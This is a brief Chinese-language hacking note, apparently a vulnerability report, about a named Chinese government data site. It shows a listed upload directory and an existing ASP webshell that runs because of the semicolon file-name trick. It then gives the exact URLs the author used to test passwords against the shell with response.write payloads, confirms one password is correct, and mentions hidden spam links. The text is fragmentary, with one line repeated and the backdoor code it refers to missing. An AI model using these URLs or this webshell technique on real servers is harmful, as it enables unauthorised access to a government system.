http://data.ylepb.gov.cn/Upload/
列目录。
http://data.ylepb.gov.cn/Upload/ali.asp;ali(1).jpg
发现此webshell被解析
googlehacking一下,在某网站找到后门程序的代码:
未解析,直接下载。
手头没菜刀,试试密码对不对吧。
http://data.ylepb.gov.cn/Upload/ali.asp;ali(1).jpg?caicaimima=response.write%20a
http://data.ylepb.gov.cn/Upload/ali.asp;ali(1).jpg?alihack.com=response.write%20a
密码是正确的。
黑链:
googlehacking一下,在某网站找到后门程序的代码: